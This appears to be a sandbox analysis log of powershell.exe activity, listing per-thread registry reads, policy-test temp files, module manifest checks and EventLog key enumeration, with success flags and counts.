Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2} False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
System Get Info type = System Directory, result_out = C:\WINDOWS\system32 True 1
Fn
File Get Info filename = C:\WINDOWS\system32\wldp.dll, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\, type = file_attributes True 1
Fn
File Create filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, type = file_type True 2
Fn
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, size = 1 True 1
Fn
Data
File Create filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, type = file_type True 2
Fn
File Write filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, size = 1 True 1
Fn
Data
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1, type = file_attributes True 1
Fn
File Delete filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_pcfxszbc.ddv.ps1 True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1, type = file_attributes True 1
Fn
File Delete filename = C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_gbsbmxho.bhs.psm1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\FD1HVy\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Thread 0x135c
2 5
Category Operation Information Success Count
Module Unmap process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe True 1
Socket Close type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Inet Close Session - True 1
Socket Close type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
System Sleep duration = -1 (infinite) True 1
Thread 0x1118
80 0
Category Operation Information Success Count
File Get Info filename = C:\WINDOWS\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 3.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes True 1
File Create filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, type = file_attributes True 1
Environment Get Environment String name = MshEnableTrace False 2
System Sleep duration = 0 milliseconds (0.000 seconds) True 23
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Environment Get Environment String name = MshEnableTrace False 1
System Sleep duration = 0 milliseconds (0.000 seconds) True 101
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Thread 0xc24
180 0
Category Operation Information Success Count
System Sleep duration = 0 milliseconds (0.000 seconds) True 9
System Sleep duration = 0 milliseconds (0.000 seconds) True 26
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
System Sleep duration = 0 milliseconds (0.000 seconds) True 52
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning\Provisioning.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV\UEV.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppvClient\AppvClient.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization\DeliveryOptimization.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ConfigCI\ConfigCI.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1, type = file_attributes True 1
File Get Info filename = C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadLine.psm1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes True 1
File Get Info filename = C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1, type = file_attributes True 1
System Sleep duration = 0 milliseconds (0.000 seconds) True 50
Thread 0xc04
155 0
Category Operation Information Success Count
System Sleep duration = 0 milliseconds (0.000 seconds) True 17
Environment Get Environment String name = MshEnableTrace False 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
